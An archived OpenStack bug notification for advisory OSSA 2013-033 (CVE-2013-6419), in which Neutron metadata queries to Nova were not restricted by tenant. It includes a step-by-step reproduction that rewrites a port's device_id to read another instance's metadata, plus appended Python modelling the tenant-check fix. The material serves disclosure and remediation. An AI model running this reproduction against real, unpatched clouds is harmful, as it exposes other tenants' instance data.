yahoo-eng-team team mailing list archive
Message #08790
[Bug 1235450] Re: [OSSA 2013-033] Metadata queries from Neutron to Nova are not restricted by tenant (CVE-2013-6419)
** Changed in: neutron
Status: Fix Committed => Fix Released
** Changed in: neutron
Milestone: None => icehouse-2
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1235450
Title:
[OSSA 2013-033] Metadata queries from Neutron to Nova are not
restricted by tenant (CVE-2013-6419)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron grizzly series:
Fix Committed
Status in neutron havana series:
Fix Released
Status in OpenStack Compute (Nova):
Fix Released
Status in OpenStack Compute (nova) grizzly series:
Fix Committed
Status in OpenStack Compute (nova) havana series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The neutron metadata service works in the following way:
Instance makes a GET request to http://169.254.169.254/
This is directed to the metadata-agent, which knows which
router (namespace) it is running in and determines the ip_address from
the http request it receives.
Now, the neutron-metadata-agent queries neutron-server using the
router_id and ip_address from the request to determine the port the
request came from. Next, the agent takes the device_id (nova-instance-id)
on the port and passes that to nova as X-Instance-ID.
The vulnerability is that if someone exposes their instance_id their
metadata can be retrieved. In order to exploit this, one would need to
update the device_id on a port to match the instance_id they want to
hijack the data from.
To demonstrate:
arosen@arosen-desktop:~/devstack$ nova list
+--------------------------------------+------+--------+------------+-------------+------------------+
| ID | Name | Status | Task State | Power State | Networks |
+--------------------------------------+------+--------+------------+-------------+------------------+
| 1eb33bf1-6400-483a-9747-e19168b68933 | vm1 | ACTIVE | None | Running | private=10.0.0.4 |
| eed973e2-58ea-42c4-858d-582ff6ac3a51 | vm2 | ACTIVE | None | Running | private=10.0.0.3 |
+--------------------------------------+------+--------+------------+-------------+------------------+
arosen@arosen-desktop:~/devstack$ neutron port-list
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
| id | name | mac_address | fixed_ips |
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
| 3128f195-c41b-4160-9a42-40e024771323 | | fa:16:3e:7d:a5:df | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.1"} |
| 62465157-8494-4fb7-bdce-2b8697f03c12 | | fa:16:3e:94:62:47 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
| 8473fb8d-b649-4281-b03a-06febf61b400 | | fa:16:3e:4f:a3:b0 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.2"} |
| 92c42c1a-efb0-46a6-89eb-a38ae170d76d | | fa:16:3e:de:9a:39 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
arosen@arosen-desktop:~/devstack$ neutron port-show 62465157-8494-4fb7-bdce-2b8697f03c12
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True |
| allowed_address_pairs | |
| device_id | 1eb33bf1-6400-483a-9747-e19168b68933 |
| device_owner | compute:None |
| extra_dhcp_opts | |
| fixed_ips | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
| id | 62465157-8494-4fb7-bdce-2b8697f03c12 |
| mac_address | fa:16:3e:94:62:47 |
| name | |
| network_id | 5f68c45d-b729-4e21-9ded-089848eb4ef2 |
| security_groups | 3e29d8e7-0195-4438-a49a-9706736b888d |
| status | ACTIVE |
| tenant_id | 0f9d696fc73d4110ab492ca105881b9b |
+-----------------------+---------------------------------------------------------------------------------+
arosen@arosen-desktop:~/devstack$ neutron port-show 92c42c1a-efb0-46a6-89eb-a38ae170d76d
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True |
| allowed_address_pairs | |
| device_id | eed973e2-58ea-42c4-858d-582ff6ac3a51 |
| device_owner | compute:None |
| extra_dhcp_opts | |
| fixed_ips | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
| id | 92c42c1a-efb0-46a6-89eb-a38ae170d76d |
| mac_address | fa:16:3e:de:9a:39 |
| name | |
| network_id | 5f68c45d-b729-4e21-9ded-089848eb4ef2 |
| security_groups | 3e29d8e7-0195-4438-a49a-9706736b888d |
| status | ACTIVE |
| tenant_id | 0f9d696fc73d4110ab492ca105881b9b |
+-----------------------+---------------------------------------------------------------------------------+
From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51):
$ curl http://169.254.169.254/latest/meta-data/hostname
vm2.novalocal
arosen@arosen-desktop:~/devstack$ neutron port-update 92c42c1a-efb0-46a6-89eb-a38ae170d76d --device_id=1eb33bf1-6400-483a-9747-e19168b68933
From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51):
$ curl http://169.254.169.254/latest/meta-data/hostname
vm1.novalocal
In order to fix this issue I believe we need to also pass the tenant-id in the metadata request to nova. When nova receives the request it will now have to query its database using the instance_id and check that the tenant_ids match. Using the tenant_id solves this issue as the user is not allowed to specify or update this field.
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1235450/+subscriptions
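The tenant check proposed in the report, modelled as an added example (this is illustrative code, not Nova's or Neutron's own implementation): the agent forwards the port's device_id and tenant_id, and the Nova side refuses to serve metadata when the forwarded tenant does not own the instance named by X-Instance-ID. The instance table and the third instance in a second tenant are constructed; the instance ids and the tenant id of vm1/vm2 are taken from the report's demonstration.

```python
import hmac
from typing import Dict, Optional, Tuple

# Constructed sample of Nova's instance table: vm1 and vm2 as in the bug
# report (same tenant), plus a constructed vm3 owned by a second tenant.
TENANT_A = "0f9d696fc73d4110ab492ca105881b9b"   # from the report's port-show output
TENANT_B = "b2c3d4e5f60718293a4b5c6d7e8f9012"   # constructed
INSTANCES: Dict[str, Dict[str, str]] = {
    "1eb33bf1-6400-483a-9747-e19168b68933": {"hostname": "vm1.novalocal", "project_id": TENANT_A},
    "eed973e2-58ea-42c4-858d-582ff6ac3a51": {"hostname": "vm2.novalocal", "project_id": TENANT_A},
    "c0ffee00-0000-4000-8000-000000000003": {"hostname": "vm3.novalocal", "project_id": TENANT_B},
}

Response = Tuple[int, Optional[str]]  # (HTTP status, hostname or None)


def agent_headers(port: Dict[str, str]) -> Dict[str, str]:
    """Headers the metadata agent derives from the port it resolved for the
    requesting IP. device_id is user-updatable; tenant_id is not."""
    return {"X-Instance-ID": port["device_id"], "X-Tenant-ID": port["tenant_id"]}


def lookup_vulnerable(headers: Dict[str, str]) -> Response:
    """Pre-fix behaviour: X-Instance-ID alone selects the instance."""
    inst = INSTANCES.get(headers.get("X-Instance-ID", ""))
    return (404, None) if inst is None else (200, inst["hostname"])


def lookup_fixed(headers: Dict[str, str]) -> Response:
    """Post-fix behaviour: X-Tenant-ID must be present and must equal the
    project that owns the instance; any mismatch is treated as not found."""
    instance_id = headers.get("X-Instance-ID")
    tenant_id = headers.get("X-Tenant-ID")
    if not instance_id or not tenant_id:
        return (400, None)           # agent did not forward both identifiers
    inst = INSTANCES.get(instance_id)
    if inst is None or not hmac.compare_digest(inst["project_id"], tenant_id):
        return (404, None)           # unknown instance or owned by another tenant
    return (200, inst["hostname"])


def demo() -> Dict[str, Response]:
    # An honest port in tenant A, and a tenant-B port whose device_id has been
    # pointed at vm1 the way the report's port-update does.
    honest = {"device_id": "eed973e2-58ea-42c4-858d-582ff6ac3a51", "tenant_id": TENANT_A}
    cross = {"device_id": "1eb33bf1-6400-483a-9747-e19168b68933", "tenant_id": TENANT_B}
    return {
        "honest_fixed": lookup_fixed(agent_headers(honest)),
        "cross_vulnerable": lookup_vulnerable(agent_headers(cross)),
        "cross_fixed": lookup_fixed(agent_headers(cross)),
    }
```

Note that the report's own demonstration uses two instances in the same tenant, which a tenant check does not separate: the fix closes cross-tenant disclosure, and instances within one tenant remain a single trust domain.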